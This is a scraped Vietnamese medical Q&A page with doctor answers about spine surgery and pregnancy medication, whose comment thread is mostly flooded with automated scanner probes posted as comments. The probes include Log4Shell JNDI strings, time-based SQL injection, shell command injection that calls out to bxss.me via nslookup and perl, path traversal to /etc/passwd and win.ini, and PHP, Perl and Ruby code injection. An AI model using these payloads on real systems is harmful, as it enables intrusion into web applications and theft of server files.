TDOCTOR: BS2
Số nhận xét: 0
Số câu trả lời: 7

Tải app Tdoctor cho bệnh nhân Tải app Tdoctor cho bệnh nhân
QrCode Nguyễn Trương Minh Thế
Không có thông báo nào từ bác sĩ
11/2015: Khoa Cơ Xương Khớp - Bệnh viện Y học cổ truyền thành phố Hồ Chí Minh 10/2012: Khoa Tim mạch cấp cứu - Bệnh viện Y học cổ truyền thành phố Hồ Chí Minh 11/2010 - 9/2012: Khoa Nội tổng hợp - Bệnh viện Y học cổ truyền thành phố Hồ Chí Minh 11/2009 - 9/2010 : Khoa Y học cổ truyền - Bệnh viện 175 Phòng khám Đông y Công Đức

Chuyên khoa

Dịch vụ

Nơi công tác

Kinh nghiệm

Quá trình đào tạo

Giá tư vấn

1000 Vnđ/Phút

Hình ảnh câu hỏi
 • Bác sĩ, Thạc sĩ Nguyễn Duy Khánh

  Ngoại Chấn thương chỉnh hình - Cột sống tại OrthoMed+ Trung tâm y khoa

  Xin chào bạn Minh. Mình là Bs Khánh. Sau khi được thấy trường hợp của bạn. Mình đang nghĩ tới phương án in xương 3D. Dưới đây là một số hình ảnh trong ca mổ mình phụ các thầy ở BV Việt Đức. Chúc bạn sớm bình phục!
  Xin chào bạn Minh. Mình là Bs Khánh. Sau khi được thấy trường hợp của bạn. Mình đang nghĩ tới phương án in xương 3D. Dưới đây là một số hình ảnh trong ca mổ mình phụ các... Xem thêm
 • Nguyễn Bình Minh

  Tháng 6 năm sau em mới có thời gian ra HN thăm khám thì có được không ạ ? Có cần càng khám nhanh càng tốt không bác sĩ
  Tháng 6 năm sau em mới có thời gian ra HN thăm khám thì có được không ạ ? Có cần càng khám nhanh càng tốt không bác sĩ
 • XoigTYYH

  response.write(9110800*9097906)
  response.write(9110800*9097906)
 • XoigTYYH

  '+response.write(9110800*9097906)+'
  '+response.write(9110800*9097906)+'
 • XoigTYYH

  "+response.write(9110800*9097906)+"
  "+response.write(9110800*9097906)+"
 • 555
  555
 • 555
  555
 • 555
  555
 • XoigTYYH

  ${j${::-n}di:dns${::-:}//hitlfnwadwaml8df36${::-.}bxss.me}zzzz
  ${j${::-n}di:dns${::-:}//hitlfnwadwaml8df36${::-.}bxss.me}zzzz
 • XoigTYYH


  ?????'"><&;|${${lower:j}${::-n}d${upper:ı}:dns${::-:}//hitnginhkdgpt28d2d${::-.}bxss.me}AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

  ?????'">
 • XoigTYYH

  ${${:::::::::::::::::-j}ndi:dns${:::::::::::::::::-:}//dns.log4j.009247.4357-4786.4357.f00c3${::-.}1${::-.}bxss.me}}
  ${${:::::::::::::::::-j}ndi:dns${:::::::::::::::::-:}//dns.log4j.009247.4357-4786.4357.f00c3${::-.}1${::-.}bxss.me}}
 • 555
  555
 • 555
  555
 • XoigTYYH

  echo fjixil$()\ gsjipe\nz^xyu||a #' &echo fjixil$()\ gsjipe\nz^xyu||a #|" &echo fjixil$()\ gsjipe\nz^xyu||a #
  echo fjixil$()\ gsjipe\nz^xyu||a #' &echo fjixil$()\ gsjipe\nz^xyu||a #|" &echo fjixil$()\ gsjipe\nz^xyu||a #
 • XoigTYYH

  -1 OR 2+771-771-1=0+0+0+1 --
  -1 OR 2+771-771-1=0+0+0+1 --
 • 555
  555
 • XoigTYYH

  &echo puvhol$()\ mnullj\nz^xyu||a #' &echo puvhol$()\ mnullj\nz^xyu||a #|" &echo puvhol$()\ mnullj\nz^xyu||a #
  &echo puvhol$()\ mnullj\nz^xyu||a #' &echo puvhol$()\ mnullj\nz^xyu||a #|" &echo puvhol$()\ mnullj\nz^xyu||a #
 • XoigTYYH

  -1 OR 2+276-276-1=0+0+0+1
  -1 OR 2+276-276-1=0+0+0+1
 • XoigTYYH

  |echo ypfmpy$()\ mzxgnh\nz^xyu||a #' |echo ypfmpy$()\ mzxgnh\nz^xyu||a #|" |echo ypfmpy$()\ mzxgnh\nz^xyu||a #
  |echo ypfmpy$()\ mzxgnh\nz^xyu||a #' |echo ypfmpy$()\ mzxgnh\nz^xyu||a #|" |echo ypfmpy$()\ mzxgnh\nz^xyu||a #
 • XoigTYYH

  -1' OR 2+550-550-1=0+0+0+1 --
  -1' OR 2+550-550-1=0+0+0+1 --
 • XoigTYYH

  (nslookup hitpoupqbppam50976.bxss.me||perl -e "gethostbyname('hitpoupqbppam50976.bxss.me')")
  (nslookup hitpoupqbppam50976.bxss.me||perl -e "gethostbyname('hitpoupqbppam50976.bxss.me')")
 • XoigTYYH

  -1' OR 2+220-220-1=0+0+0+1 or 'sOsWaFt5'='
  -1' OR 2+220-220-1=0+0+0+1 or 'sOsWaFt5'='
 • XoigTYYH

  $(nslookup hitholzuspltu6f098.bxss.me||perl -e "gethostbyname('hitholzuspltu6f098.bxss.me')")
  $(nslookup hitholzuspltu6f098.bxss.me||perl -e "gethostbyname('hitholzuspltu6f098.bxss.me')")
 • XoigTYYH

  -1" OR 2+773-773-1=0+0+0+1 --
  -1" OR 2+773-773-1=0+0+0+1 --
 • XoigTYYH

  if(now()=sysdate(),sleep(15),0)
  if(now()=sysdate(),sleep(15),0)
 • XoigTYYH

  &(nslookup hitzwqdjrefuzb88e0.bxss.me||perl -e "gethostbyname('hitzwqdjrefuzb88e0.bxss.me')")&'\"`0&(nslookup hitzwqdjrefuzb88e0.bxss.me||perl -e "gethostbyname('hitzwqdjrefuzb88e0.bxss.me')")&`'
  &(nslookup hitzwqdjrefuzb88e0.bxss.me||perl -e "gethostbyname('hitzwqdjrefuzb88e0.bxss.me')")&'\"`0&(nslookup hitzwqdjrefuzb88e0.bxss.me||perl -e "gethostbyname('hitzwqdjrefuzb88e0.bxss.me')")&`'
 • XoigTYYH

  |(nslookup hitezfikaafrvd7051.bxss.me||perl -e "gethostbyname('hitezfikaafrvd7051.bxss.me')")
  |(nslookup hitezfikaafrvd7051.bxss.me||perl -e "gethostbyname('hitezfikaafrvd7051.bxss.me')")
 • XoigTYYH

  `(nslookup hitanxanmunpu8a7d7.bxss.me||perl -e "gethostbyname('hitanxanmunpu8a7d7.bxss.me')")`
  `(nslookup hitanxanmunpu8a7d7.bxss.me||perl -e "gethostbyname('hitanxanmunpu8a7d7.bxss.me')")`
 • XoigTYYH

  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
 • XoigTYYH

  ;(nslookup hittqhpmvcgkhacf41.bxss.me||perl -e "gethostbyname('hittqhpmvcgkhacf41.bxss.me')")|(nslookup hittqhpmvcgkhacf41.bxss.me||perl -e "gethostbyname('hittqhpmvcgkhacf41.bxss.me')")&(nslookup hittqhpmvcgkhacf41.bxss.me||perl -e "gethostbyname('hittqhpmvcgkhacf41.bxss.me')")
  ;(nslookup hittqhpmvcgkhacf41.bxss.me||perl -e "gethostbyname('hittqhpmvcgkhacf41.bxss.me')")|(nslookup hittqhpmvcgkhacf41.bxss.me||perl -e "gethostbyname('hittqhpmvcgkhacf41.bxss.me')")&(nslookup... Xem thêm
 • XoigTYYH

  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
 • 555
  555
 • XoigTYYH

  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
 • XoigTYYH

  -1; waitfor delay '0:0:15' --
  -1; waitfor delay '0:0:15' --
 • 555
  555
 • XoigTYYH

  -1); waitfor delay '0:0:15' --
  -1); waitfor delay '0:0:15' --
 • XoigTYYH

  1 waitfor delay '0:0:15' --
  1 waitfor delay '0:0:15' --
 • 555
  555
 • XoigTYYH

  tt36X2Zs'; waitfor delay '0:0:15' --
  tt36X2Zs'; waitfor delay '0:0:15' --
 • 555
  555
 • XoigTYYH

  -5 OR 553=(SELECT 553 FROM PG_SLEEP(15))--
  -5 OR 553=(SELECT 553 FROM PG_SLEEP(15))--
 • 555
  555
 • XoigTYYH

  -5) OR 728=(SELECT 728 FROM PG_SLEEP(15))--
  -5) OR 728=(SELECT 728 FROM PG_SLEEP(15))--
 • 555
  555
 • 555
  555
 • XoigTYYH

  -1)) OR 331=(SELECT 331 FROM PG_SLEEP(15))--
  -1)) OR 331=(SELECT 331 FROM PG_SLEEP(15))--
 • XoigTYYH

  ../../../../../../../../../../../../../../etc/passwd
  ../../../../../../../../../../../../../../etc/passwd
 • 555
  555
 • XoigTYYH

  ../../../../../../../../../../../../../../windows/win.ini
  ../../../../../../../../../../../../../../windows/win.ini
 • XoigTYYH

  ET8QbMar' OR 405=(SELECT 405 FROM PG_SLEEP(15))--
  ET8QbMar' OR 405=(SELECT 405 FROM PG_SLEEP(15))--
 • XoigTYYH

  12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'????
  12345'"\'\");|]*%00{%0d%0a%bf%27'????
 • 555
  555
 • XoigTYYH

  yVWh4nJ8') OR 269=(SELECT 269 FROM PG_SLEEP(15))--
  yVWh4nJ8') OR 269=(SELECT 269 FROM PG_SLEEP(15))--
 • XoigTYYH

  crbniQBG')) OR 962=(SELECT 962 FROM PG_SLEEP(15))--
  crbniQBG')) OR 962=(SELECT 962 FROM PG_SLEEP(15))--
 • XoigTYYH

  555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
  555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
 • 555
  555
 • XoigTYYH

  555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
  555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
 • 555
  555
 • 555
  555
 • 555
  555
 • 555
  555
 • 555
  555
 • 555
  555
 • 555
  555
 • 555
  555
 • 555
  555
 • 555
  555
 • 555
  555
 • 555
  555
 • 555
  555
 • 555
  555
 • 555
  555
 • 555
  555
 • 555
  555
 • 555
  555
 • 555
  555
 • 555
  555
 • XoigTYYH

  http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg
  http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg
 • XoigTYYH

  1some_inexistent_file_with_long_name%00.jpg
  1some_inexistent_file_with_long_name%00.jpg
 • 555
  555
 • XoigTYYH

  Http://bxss.me/t/fit.txt
  Http://bxss.me/t/fit.txt
 • XoigTYYH

  http://bxss.me/t/fit.txt%3F.jpg
  http://bxss.me/t/fit.txt%3F.jpg
 • 555
  555
 • 555
  555
 • 555
  555
 • 555
  555
 • 555
  555
 • 555
  555
 • 555
  555
 • XoigTYYH

  ^(#$!@#$)(()))******
  ^(#$!@#$)(()))******
 • 555
  555
 • 555
  555
 • 555
  555
 • 555
  555
 • XoigTYYH

  '.gethostbyname(lc('hitrb'.'mrzdhsdfedf43.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(102).chr(73).chr(117).chr(73).'
  '.gethostbyname(lc('hitrb'.'mrzdhsdfedf43.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(102).chr(73).chr(117).chr(73).'
 • XoigTYYH

  ".gethostbyname(lc("hitzi"."wxbwebghbb12c.bxss.me."))."A".chr(67).chr(hex("58")).chr(107).chr(80).chr(111).chr(86)."
  ".gethostbyname(lc("hitzi"."wxbwebghbb12c.bxss.me."))."A".chr(67).chr(hex("58")).chr(107).chr(80).chr(111).chr(86)."
 • 555
  555
 • 555
  555
 • XoigTYYH

  HttP://bxss.me/t/xss.html?%00
  HttP://bxss.me/t/xss.html?%00
 • XoigTYYH

  "+"A".concat(70-3).concat(22*4).concat(103).concat(72).concat(106).concat(66)+(require"socket"
  Socket.gethostbyname("hitxj"+"mjtmwpyi13aa1.bxss.me.")[3].to_s)+"
  "+"A".concat(70-3).concat(22*4).concat(103).concat(72).concat(106).concat(66)+(require"socket"
  Socket.gethostbyname("hitxj"+"mjtmwpyi13aa1.bxss.me.")[3].to_s)+"
 • XoigTYYH

  bxss.me/t/xss.html?%00
  bxss.me/t/xss.html?%00
 • XoigTYYH

  '+'A'.concat(70-3).concat(22*4).concat(110).concat(79).concat(113).concat(80)+(require'socket'
  Socket.gethostbyname('hitqj'+'nszkkyhc9b371.bxss.me.')[3].to_s)+'
  '+'A'.concat(70-3).concat(22*4).concat(110).concat(79).concat(113).concat(80)+(require'socket'
  Socket.gethostbyname('hitqj'+'nszkkyhc9b371.bxss.me.')[3].to_s)+'
 • 555
  555
 • 555
  555
 • XoigTYYH

  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
 • 555
  555
 • 555
  555
 • XoigTYYH

  ';print(md5(31337));$a='
  ';print(md5(31337));$a='
 • XoigTYYH

  ";print(md5(31337));$a="
  ";print(md5(31337));$a="
 • XoigTYYH

  ${@print(md5(31337))}
  ${@print(md5(31337))}
 • XoigTYYH

  ${@print(md5(31337))}\
  ${@print(md5(31337))}\
 • XoigTYYH

  '.print(md5(31337)).'
  '.print(md5(31337)).'
 • XoigTYYH

  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
 • 555
  555
 • 555
  555
 • 555
  555
 • 555
  555
 • 555
  555
 • 555
  555
 • 555
  555
 • 555
  555
 • Bác sĩ, Thạc sĩ Nguyễn Duy Khánh

  Ngoại Chấn thương chỉnh hình - Cột sống tại OrthoMed+ Trung tâm y khoa

  Xin chào bạn. Sau khi được bạn cung cấp thông tin thì mình thấy trường hợp của bà đang phối hợp nhiều bệnh. Mình nghĩ bạn nên đưa bà đến khám và điều trị tại các cơ sở y tế để bà nhận được sự chăm sóc tốt nhất. Chúc bà sớm hồi phục.
  Xin chào bạn. Sau khi được bạn cung cấp thông tin thì mình thấy trường hợp của bà đang phối hợp nhiều bệnh. Mình nghĩ bạn nên đưa bà đến khám và điều trị tại các cơ... Xem thêm
 • XoigTYYH

  response.write(9555959*9313788)
  response.write(9555959*9313788)
 • XoigTYYH

  '+response.write(9555959*9313788)+'
  '+response.write(9555959*9313788)+'
 • XoigTYYH

  "+response.write(9555959*9313788)+"
  "+response.write(9555959*9313788)+"
 • 555
  555
 • XoigTYYH

  ${j${::-n}di:dns${::-:}//hitddjlpqnvrvefcc7${::-.}bxss.me}zzzz
  ${j${::-n}di:dns${::-:}//hitddjlpqnvrvefcc7${::-.}bxss.me}zzzz
 • 555
  555
 • 555
  555
 • XoigTYYH


  ?????'"><&;|${${lower:j}${::-n}d${upper:ı}:dns${::-:}//hitikwwfbgaeif9c34${::-.}bxss.me}AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

  ?????'">
 • XoigTYYH

  ${${:::::::::::::::::-j}ndi:dns${:::::::::::::::::-:}//dns.log4j.009247.4357-4975.4357.f00c3${::-.}1${::-.}bxss.me}}
  ${${:::::::::::::::::-j}ndi:dns${:::::::::::::::::-:}//dns.log4j.009247.4357-4975.4357.f00c3${::-.}1${::-.}bxss.me}}
 • 555
  555
 • 555
  555
 • 555
  555
 • XoigTYYH

  echo uecbab$()\ lvervr\nz^xyu||a #' &echo uecbab$()\ lvervr\nz^xyu||a #|" &echo uecbab$()\ lvervr\nz^xyu||a #
  echo uecbab$()\ lvervr\nz^xyu||a #' &echo uecbab$()\ lvervr\nz^xyu||a #|" &echo uecbab$()\ lvervr\nz^xyu||a #
 • XoigTYYH

  &echo hgddjt$()\ jmfqfe\nz^xyu||a #' &echo hgddjt$()\ jmfqfe\nz^xyu||a #|" &echo hgddjt$()\ jmfqfe\nz^xyu||a #
  &echo hgddjt$()\ jmfqfe\nz^xyu||a #' &echo hgddjt$()\ jmfqfe\nz^xyu||a #|" &echo hgddjt$()\ jmfqfe\nz^xyu||a #
 • XoigTYYH

  |echo smrsds$()\ clpuww\nz^xyu||a #' |echo smrsds$()\ clpuww\nz^xyu||a #|" |echo smrsds$()\ clpuww\nz^xyu||a #
  |echo smrsds$()\ clpuww\nz^xyu||a #' |echo smrsds$()\ clpuww\nz^xyu||a #|" |echo smrsds$()\ clpuww\nz^xyu||a #
 • XoigTYYH

  (nslookup hitelrzbmqjsr3fa44.bxss.me||perl -e "gethostbyname('hitelrzbmqjsr3fa44.bxss.me')")
  (nslookup hitelrzbmqjsr3fa44.bxss.me||perl -e "gethostbyname('hitelrzbmqjsr3fa44.bxss.me')")
 • XoigTYYH

  -1 OR 2+925-925-1=0+0+0+1 --
  -1 OR 2+925-925-1=0+0+0+1 --
 • XoigTYYH

  $(nslookup hitdozekjdsgtb713a.bxss.me||perl -e "gethostbyname('hitdozekjdsgtb713a.bxss.me')")
  $(nslookup hitdozekjdsgtb713a.bxss.me||perl -e "gethostbyname('hitdozekjdsgtb713a.bxss.me')")
 • XoigTYYH

  12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'????
  12345'"\'\");|]*%00{%0d%0a%bf%27'????
 • XoigTYYH

  &(nslookup hitpkzozsnyno86df1.bxss.me||perl -e "gethostbyname('hitpkzozsnyno86df1.bxss.me')")&'\"`0&(nslookup hitpkzozsnyno86df1.bxss.me||perl -e "gethostbyname('hitpkzozsnyno86df1.bxss.me')")&`'
  &(nslookup hitpkzozsnyno86df1.bxss.me||perl -e "gethostbyname('hitpkzozsnyno86df1.bxss.me')")&'\"`0&(nslookup hitpkzozsnyno86df1.bxss.me||perl -e "gethostbyname('hitpkzozsnyno86df1.bxss.me')")&`'
 • XoigTYYH

  -1 OR 2+247-247-1=0+0+0+1
  -1 OR 2+247-247-1=0+0+0+1
 • XoigTYYH

  |(nslookup hitxzdqckliziee834.bxss.me||perl -e "gethostbyname('hitxzdqckliziee834.bxss.me')")
  |(nslookup hitxzdqckliziee834.bxss.me||perl -e "gethostbyname('hitxzdqckliziee834.bxss.me')")
 • XoigTYYH

  -1' OR 2+774-774-1=0+0+0+1 --
  -1' OR 2+774-774-1=0+0+0+1 --
 • XoigTYYH

  `(nslookup hityrbiypjjew50d3d.bxss.me||perl -e "gethostbyname('hityrbiypjjew50d3d.bxss.me')")`
  `(nslookup hityrbiypjjew50d3d.bxss.me||perl -e "gethostbyname('hityrbiypjjew50d3d.bxss.me')")`
 • XoigTYYH

  -1' OR 2+353-353-1=0+0+0+1 or 'eQncX21V'='
  -1' OR 2+353-353-1=0+0+0+1 or 'eQncX21V'='
 • 555
  555
 • XoigTYYH

  ;(nslookup hitqytoiovhrk352b2.bxss.me||perl -e "gethostbyname('hitqytoiovhrk352b2.bxss.me')")|(nslookup hitqytoiovhrk352b2.bxss.me||perl -e "gethostbyname('hitqytoiovhrk352b2.bxss.me')")&(nslookup hitqytoiovhrk352b2.bxss.me||perl -e "gethostbyname('hitqytoiovhrk352b2.bxss.me')")
  ;(nslookup hitqytoiovhrk352b2.bxss.me||perl -e "gethostbyname('hitqytoiovhrk352b2.bxss.me')")|(nslookup hitqytoiovhrk352b2.bxss.me||perl -e "gethostbyname('hitqytoiovhrk352b2.bxss.me')")&(nslookup... Xem thêm
 • XoigTYYH

  -1" OR 2+73-73-1=0+0+0+1 --
  -1" OR 2+73-73-1=0+0+0+1 --
 • 555
  555
 • 555
  555
 • XoigTYYH

  if(now()=sysdate(),sleep(15),0)
  if(now()=sysdate(),sleep(15),0)
 • 555
  555
 • XoigTYYH

  ../../../../../../../../../../../../../../etc/passwd
  ../../../../../../../../../../../../../../etc/passwd
 • XoigTYYH

  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
 • 555
  555
 • XoigTYYH

  ../../../../../../../../../../../../../../windows/win.ini
  ../../../../../../../../../../../../../../windows/win.ini
 • XoigTYYH

  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
 • 555
  555
 • XoigTYYH

  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
 • 555
  555
 • XoigTYYH

  -1; waitfor delay '0:0:15' --
  -1; waitfor delay '0:0:15' --
 • 555
  555
 • XoigTYYH

  -1); waitfor delay '0:0:15' --
  -1); waitfor delay '0:0:15' --
 • 555
  555
 • 555
  555
 • XoigTYYH

  1 waitfor delay '0:0:15' --
  1 waitfor delay '0:0:15' --
 • 555
  555
 • XoigTYYH

  qlPEKFU9'; waitfor delay '0:0:15' --
  qlPEKFU9'; waitfor delay '0:0:15' --
 • 555
  555
 • XoigTYYH

  -5 OR 932=(SELECT 932 FROM PG_SLEEP(15))--
  -5 OR 932=(SELECT 932 FROM PG_SLEEP(15))--
 • 555
  555
 • 555
  555
 • XoigTYYH

  -5) OR 146=(SELECT 146 FROM PG_SLEEP(15))--
  -5) OR 146=(SELECT 146 FROM PG_SLEEP(15))--
 • XoigTYYH

  -1)) OR 659=(SELECT 659 FROM PG_SLEEP(15))--
  -1)) OR 659=(SELECT 659 FROM PG_SLEEP(15))--
 • XoigTYYH

  sr57PVq6' OR 705=(SELECT 705 FROM PG_SLEEP(15))--
  sr57PVq6' OR 705=(SELECT 705 FROM PG_SLEEP(15))--
 • XoigTYYH

  17gATwbN') OR 183=(SELECT 183 FROM PG_SLEEP(15))--
  17gATwbN') OR 183=(SELECT 183 FROM PG_SLEEP(15))--
 • XoigTYYH

  M2NMdjMI')) OR 473=(SELECT 473 FROM PG_SLEEP(15))--
  M2NMdjMI')) OR 473=(SELECT 473 FROM PG_SLEEP(15))--
 • XoigTYYH

  555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
  555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
 • XoigTYYH

  555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
  555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
 • 555
  555
 • 555
  555
 • 555
  555
 • 555
  555
 • 555
  555
 • 555
  555
 • 555
  555
 • XoigTYYH

  http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg
  http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg
 • 555
  555
 • XoigTYYH

  1some_inexistent_file_with_long_name%00.jpg
  1some_inexistent_file_with_long_name%00.jpg
 • 555
  555
 • XoigTYYH

  Http://bxss.me/t/fit.txt
  Http://bxss.me/t/fit.txt
 • 555
  555
 • XoigTYYH

  http://bxss.me/t/fit.txt%3F.jpg
  http://bxss.me/t/fit.txt%3F.jpg
 • 555
  555
 • 555
  555
 • 555
  555
 • 555
  555
 • 555
  555
 • 555
  555
 • 555
  555
 • 555
  555
 • 555
  555
 • 555
  555
 • 555
  555
 • 555
  555
 • 555
  555
 • 555
  555
 • 555
  555
 • XoigTYYH

  '.gethostbyname(lc('hitbp'.'gmreldhndedf0.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(118).chr(70).chr(112).chr(76).'
  '.gethostbyname(lc('hitbp'.'gmreldhndedf0.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(118).chr(70).chr(112).chr(76).'
 • XoigTYYH

  ^(#$!@#$)(()))******
  ^(#$!@#$)(()))******
 • XoigTYYH

  ".gethostbyname(lc("hitvg"."qmuaxkkn908a9.bxss.me."))."A".chr(67).chr(hex("58")).chr(114).chr(73).chr(99).chr(85)."
  ".gethostbyname(lc("hitvg"."qmuaxkkn908a9.bxss.me."))."A".chr(67).chr(hex("58")).chr(114).chr(73).chr(99).chr(85)."
 • 555
  555
 • 555
  555
 • 555
  555
 • 555
  555
 • 555
  555
 • 555
  555
 • XoigTYYH

  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
 • 555
  555
 • XoigTYYH

  "+"A".concat(70-3).concat(22*4).concat(119).concat(83).concat(110).concat(83)+(require"socket"
  Socket.gethostbyname("hitep"+"lsmruflwe9dc7.bxss.me.")[3].to_s)+"
  "+"A".concat(70-3).concat(22*4).concat(119).concat(83).concat(110).concat(83)+(require"socket"
  Socket.gethostbyname("hitep"+"lsmruflwe9dc7.bxss.me.")[3].to_s)+"
 • XoigTYYH

  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
 • XoigTYYH

  '+'A'.concat(70-3).concat(22*4).concat(108).concat(82).concat(106).concat(77)+(require'socket'
  Socket.gethostbyname('hitoq'+'jslzccxa89f88.bxss.me.')[3].to_s)+'
  '+'A'.concat(70-3).concat(22*4).concat(108).concat(82).concat(106).concat(77)+(require'socket'
  Socket.gethostbyname('hitoq'+'jslzccxa89f88.bxss.me.')[3].to_s)+'
 • XoigTYYH

  HttP://bxss.me/t/xss.html?%00
  HttP://bxss.me/t/xss.html?%00
 • XoigTYYH

  ';print(md5(31337));$a='
  ';print(md5(31337));$a='
 • 555
  555
 • XoigTYYH

  bxss.me/t/xss.html?%00
  bxss.me/t/xss.html?%00
 • XoigTYYH

  ";print(md5(31337));$a="
  ";print(md5(31337));$a="
 • 555
  555
 • 555
  555
 • 555
  555
 • XoigTYYH

  ${@print(md5(31337))}
  ${@print(md5(31337))}
 • 555
  555
 • XoigTYYH

  ${@print(md5(31337))}\
  ${@print(md5(31337))}\
 • XoigTYYH

  '.print(md5(31337)).'
  '.print(md5(31337)).'
 • 555
  555
 • 555
  555
 • 555
  555
 • 555
  555
 • Thân gửi chị Hồng,
  Trước tiên, ViCare xin cảm ơn chị Hồng đã tin tưởng và sử dụng tính năng Hỏi Bác Sĩ của bên em. ViCare có nhận được hình ảnh của chị về bệnh u máu. Tuy nhiên, bên em hi vọng chị Hồng có thể cung cấp thêm một số thông tin sau để được nhận lời giải đáp từ các bác sĩ chuyên khoa:
  - Vấn đề chị muốn hỏi
  - Tình trạng bệnh lý
  - Tuổi, giới tính của bệnh nhân
  Chúc chị sức khỏe!
  Thân gửi chị Hồng,
  Trước tiên, ViCare xin cảm ơn chị Hồng đã tin tưởng và sử dụng tính năng Hỏi Bác Sĩ của bên em. ViCare có nhận được hình ảnh của chị về bệnh u... Xem thêm

Trả lờiThưa Bác sĩ.

Em là nữ giới, năm nay 31 tuổi. Lấy chồng nay đã được 3 năm nhưng chưa có em bé. Trước đó, em đã dùng thuốc điều kinh 10 thang. Hôm nay, em đến định cắt thêm thuốc điều kinh nhưng được bác sĩ giải đáp nên thử thai trước khi dùng thuốc này. Em qua phòng khám siêu âm ổ bụng và thử thai bằng que thử 2 lần đều kết quả 2 vạch. Bác sĩ siêu âm kết luận thai nhi 4 tuần tuổi, cần theo dõi thêm và kê đơn thuốc viên bổ cho bà bầu Mendicet Mum. Và khi quay lại phòng khám Đông y thì Bác sĩ kê thuốc dưỡng thai cho em. Hiện tại em rất băn khoăn có nên uống 2 loại thuốc này không? Và uống cùng 1 lúc được không? Cách uống thế nào? Và cho em hỏi thuốc Mendicet Mum có phải thực phẩm chức năng không? Em có nên uống loại thuốc Mendicet Mum này không? Liệu trước đó em dùng thuốc điều kinh có tác động đến thai nhi không?

Em xin chân thành cảm ơn và nhận được sự giải đáp sớm từ Bác sĩ!
 • Dung dịch 10%: Người lớn bôi dung dịch không pha loãng lên vùng da để khử khuẩn hoặc vào vùng tổn thương (Herpes Simplex, Zona, vết thương) để tránh nhiễm khuẩn. Ngày bôi 2 lần và nếu cần, phủ gạc lên vết thương. Liều trẻ em và người cao tuổi như liều người lớn.

 • Dung dịch súc miệng 1%: Người lớn và trẻ em trên 6 tuổi: Dùng dung dịch không pha hoặc pha loãng một nửa với nước ấm. Mỗi lần súc miệng khoảng 10ml trong 30 giây và không được nuốt. Ngày có thể súc miệng tới 4 lần, và có thể kéo dài tới 14 ngày liền.Thưa Bác sĩ.

Em là nữ giới, năm nay 31 tuổi. Lấy chồng nay đã được 3 năm nhưng chưa có em bé. Trước đó, em đã dùng thuốc điều kinh 10 thang. Hôm nay, em đến định cắt... Xem thêm
 • Bác sĩ trả lời
  Bác sĩ trả lời

Trả lời

 • Minh Tran  Chào bạn!

  Theo thông tin bạn mô tả thì bạn đang giai đoạn 3 tháng đầu của thai kỳ, ở giai đoạn này phần lớn các “bà bầu” có triệu chứng nghén, có thể mức độ vừa hoặc nặng. Trong tình huống nhẹ thì chỉ cần ăn uống và nghỉ ngơi hợp lý thì triệu chứng nghén sẽ giảm dần và hết sau 3 tháng, nhưng tình huống nặng (nôn nhiều, mệt mỏi, đau bụng, không ăn uống được, suy kiệt,…) thì cần phải kịp thời đi khám để tránh nguy cơ tác động tới sức khoẻ của cả mẹ và thai nhi.

